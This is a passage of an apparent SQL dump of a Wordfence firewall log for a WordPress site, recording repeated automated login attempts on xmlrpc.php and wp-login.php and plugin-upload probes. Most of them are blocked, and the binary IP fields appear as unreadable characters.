Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12356,0.000000,1631437849.990242,'\0\0\0\0\0\0\0\0\0\0��\"C�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12357,0.000000,1631437874.862111,'\0\0\0\0\0\0\0\0\0\0���%*2',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12358,0.000000,1631438152.588420,'\0\0\0\0\0\0\0\0\0\0���\n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12359,0.000000,1631438296.188729,'\0\0\0\0\0\0\0\0\0\0��g�z',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12360,0.000000,1631438499.566219,'\0\0\0\0\0\0\0\0\0\0��t���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12361,0.000000,1631438802.192379,'\0\0\0\0\0\0\0\0\0\0��ȉ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12362,0.000000,1631438816.991878,'\0\0\0\0\0\0\0\0\0\0��[�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12363,0.000000,1631439074.742941,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12364,0.000000,1631439122.447473,'\0\0\0\0\0\0\0\0\0\0����Z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12365,0.000000,1631439464.013488,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12366,0.000000,1631439796.332871,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12367,0.000000,1631439805.681096,'\0\0\0\0\0\0\0\0\0\0���Z�C',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12368,0.000000,1631440127.576311,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12369,0.000000,1631440339.870672,'\0\0\0\0\0\0\0\0\0\0��y+�N',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12370,0.000000,1631440451.758768,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12371,0.000000,1631440773.585000,'\0\0\0\0\0\0\0\0\0\0��g/<,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12372,0.000000,1631441103.180990,'\0\0\0\0\0\0\0\0\0\0���A�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12373,0.000000,1631441340.910287,'\0\0\0\0\0\0\0\0\0\0��oZ��',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12374,0.000000,1631441421.193170,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12375,0.000000,1631441457.844691,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12376,0.000000,1631441685.241803,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12377,1631441686.610236,1631441686.511000,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12378,0.000000,1631441765.043508,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12379,0.000000,1631441785.259032,'\0\0\0\0\0\0\0\0\0\0���Gǫ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12380,0.000000,1631441941.143666,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12381,0.000000,1631442176.633601,'\0\0\0\0\0\0\0\0\0\0��]q�v',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12382,0.000000,1631442406.515997,'\0\0\0\0\0\0\0\0\0\0��)�$',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12383,0.000000,1631442445.919736,'\0\0\0\0\0\0\0\0\0\0���7pm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12384,0.000000,1631442525.855514,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12385,1631442527.349750,1631442527.272800,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12386,0.000000,1631442551.091525,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12387,0.000000,1631442797.931438,'\0\0\0\0\0\0\0\0\0\0��P��F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12388,0.000000,1631442809.460835,'\0\0\0\0\0\0\0\0\0\0��]��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12389,0.000000,1631443136.345999,'\0\0\0\0\0\0\0\0\0\0��6%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12390,0.000000,1631443366.712014,'\0\0\0\0\0\0\0\0\0\0���\"%\'',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12391,0.000000,1631443441.706096,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12392,0.000000,1631443487.396659,'\0\0\0\0\0\0\0\0\0\0��Wk�6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12393,0.000000,1631443818.241598,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12394,0.000000,1631443844.200856,'\0\0\0\0\0\0\0\0\0\0����[�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12395,0.000000,1631443960.187350,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12396,0.000000,1631444152.523825,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12397,0.000000,1631444157.381360,'\0\0\0\0\0\0\0\0\0\0���;�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12398,0.000000,1631444427.820016,'\0\0\0\0\0\0\0\0\0\0��4�\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12399,0.000000,1631444835.197193,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12400,0.000000,1631445014.692196,'\0\0\0\0\0\0\0\0\0\0���;S�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12401,0.000000,1631445171.533820,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12402,0.000000,1631445534.479264,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12403,0.000000,1631445580.768110,'\0\0\0\0\0\0\0\0\0\0��\"Yl!',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12404,0.000000,1631445878.827172,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12405,0.000000,1631446101.647014,'\0\0\0\0\0\0\0\0\0\0��>z�&',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12406,0.000000,1631446226.149205,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12407,0.000000,1631446578.489869,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12408,0.000000,1631446690.912433,'\0\0\0\0\0\0\0\0\0\0���?�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12409,0.000000,1631446939.297037,'\0\0\0\0\0\0\0\0\0\0����w!',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12410,0.000000,1631447128.708928,'\0\0\0\0\0\0\0\0\0\0���a�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12411,0.000000,1631447227.461548,'\0\0\0\0\0\0\0\0\0\0����`',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12412,0.000000,1631447754.382789,'\0\0\0\0\0\0\0\0\0\0��\r~r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12413,0.000000,1631447814.970677,'\0\0\0\0\0\0\0\0\0\0��g3gI',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12414,0.000000,1631447930.054139,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12415,0.000000,1631448156.769699,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12416,0.000000,1631448343.180112,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12417,0.000000,1631448533.689314,'\0\0\0\0\0\0\0\0\0\0��P��o',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12418,0.000000,1631448883.897295,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12419,0.000000,1631448894.446486,'\0\0\0\0\0\0\0\0\0\0��)�H�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12420,0.000000,1631449247.755027,'\0\0\0\0\0\0\0\0\0\0��4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12421,0.000000,1631449408.833219,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12422,0.000000,1631449591.072749,'\0\0\0\0\0\0\0\0\0\0��B�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12423,0.000000,1631449948.790960,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12424,0.000000,1631450081.111665,'\0\0\0\0\0\0\0\0\0\0�����z',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12425,0.000000,1631450277.515838,'\0\0\0\0\0\0\0\0\0\0��h�-�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12426,0.000000,1631450653.358034,'\0\0\0\0\0\0\0\0\0\0��3\rH�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12427,0.000000,1631450659.961627,'\0\0\0\0\0\0\0\0\0\0��ȉ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12428,0.000000,1631451014.931432,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12429,0.000000,1631451196.008405,'\0\0\0\0\0\0\0\0\0\0��E�\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12430,0.000000,1631451380.052391,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12431,0.000000,1631451751.929869,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12432,0.000000,1631451776.627760,'\0\0\0\0\0\0\0\0\0\0��g�z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12433,0.000000,1631452099.483039,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12434,0.000000,1631452278.320541,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12435,0.000000,1631452481.732897,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12436,0.000000,1631452843.481602,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12437,0.000000,1631452913.260636,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12438,0.000000,1631453205.126002,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12439,0.000000,1631453580.753197,'\0\0\0\0\0\0\0\0\0\0��@�5?',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12440,0.000000,1631453981.299452,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12441,0.000000,1631454081.293223,'\0\0\0\0\0\0\0\0\0\0�����J',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12442,0.000000,1631454345.251268,'\0\0\0\0\0\0\0\0\0\0�����|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12443,0.000000,1631454624.420850,'\0\0\0\0\0\0\0\0\0\0��)�$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12444,0.000000,1631454627.782739,'\0\0\0\0\0\0\0\0\0\0���GY\\',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12445,0.000000,1631454726.107770,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12446,0.000000,1631455093.619053,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12447,0.000000,1631455202.897676,'\0\0\0\0\0\0\0\0\0\0��3��3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 